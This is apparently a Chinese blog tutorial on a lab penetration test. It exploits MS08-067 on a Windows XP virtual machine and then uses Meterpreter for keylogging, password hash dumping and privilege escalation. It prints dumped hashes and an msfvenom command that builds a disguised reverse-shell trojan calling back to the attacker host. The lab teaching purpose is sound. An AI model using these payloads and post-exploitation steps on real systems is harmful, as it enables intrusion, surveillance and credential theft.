栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

Meterpreter渗透测试入门

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Meterpreter渗透测试入门

又是一个下雨的星期天,小黑ailx10开始了渗透测试实验之旅。这篇文章通过实验的方式、踩坑,利用漏洞ms080-067成功入侵WinXP靶机后,后渗透测试工程师Meterpreter掌握的几个最最最基本操作。比如查看靶机信息、截屏、获取键盘记录、收集密码、权限提升等。你也可以参考David Kennedy的《metasploit:The Penetration Tester's Guide》,清华大学诸葛建伟老师翻译的《metasploit渗透测试指南》进行实验。

  • 虚拟靶机:192.168.0.106(WinXP@hu、ailx13、ailx14用户)
  • 虚拟小黑:192.168.0.104(Kali@ailx10)

第一步:初始化环境>在靶机上关闭防火墙

通过Nmap对端口进行扫描,我们看到了靶机上开放了135、139、445、3389高危端口

第二步:在虚拟小黑上对虚拟靶机进行ms08067漏洞扫描

nmap -sT -A --script=smb-vuln-ms08-067 -P0 192.168.0.102

第三步:配置参数获得Shell大功告成

第四步:使用screenshot命令截屏

第五步:使用sysinfo命令查看计算机信息

第六步:使用ps命令查看系统运行的进程

找到记事本进程1524,后面可以记录虚拟靶机用户(学生ailx12)在记事本中写日记的内容。

第七步:使用run post/windows/capture/keylog_recorder命令获取键盘记录

第八步:在靶机的记事本中打字,写下今天的日记

第九步:查看键盘记录的内容,成功看到虚拟靶机的记事本内容

  • 黑客会给你发一个网站,然后记录你在浏览器中输入的用户名和密码
  • 如果你的电脑中了木马,只要你敲键盘,你的动作可能都会被捕捉

第十步:使用run post/windows/gather/hashdump命usr令获取密码哈希值

仔细观察,发现3个哈希值都是aad3b435开头,它表示空密码~

Administrator:500:4159e786e2e935f8aad3b435b51404ee:28adbdb0c21b79ae0fc8a817134ed8c6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9c5947b6961aa6c42c79a4f95229c735:1c8efd34c3f4a30e9b65f4b63f2ea519:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:cf2a6e72fed6f0f0378af0c9b52e9332:::
hu:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

我们可以通过shell命令进入cmd命令行模式

第十一步:传递哈希值

我们短时间破解不了哈希值的明文,怎么进一步呢?这里就要用到哈希传递技术。

在实验的过程中,遇到了坑,竟然不能用了,在XP上测试无效...

遇到这种事情不要慌,有时候换个系统就好了,环境问题都是小问题,多折腾就明白了。

第十二步:权限提升

首先通过net user 创建2个普通用户ailx13和ailx14

生成一个虚拟XP系统专用木马,放都虚拟靶机桌面,你可以假设这个以Love伪装的木马被用户ailx13下载了

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=443 -f exe -o ailx13_love.exe

在虚拟小黑上监听咱们的这个木马

当虚拟靶机用户ailx13运行了木马程序ailx13-love,咱们的虚拟小黑就获得了一个Shell

在虚拟靶机上也可以验证,通过netstat命令可以看到它和虚拟小黑建立了https连接

虽然XP专属木马ailx13-love生效了,但是ailx13用户是个普通用户,想通过use priv命令进行提权失败了,并不能提升成管理员。哈哈,环境问题,都是小问题不要在意。

提权2步法:实验环境并没有生效,getuid发现还是ailx13用户,并不是system用户。WinXP系统太老了,没人用了,建议大家在Win7上面试试~

  • use priv
  • getsystem

关于内网横向移动、跳板机,敬请期待下一篇专栏文章,谢谢阅读~

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/679421.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号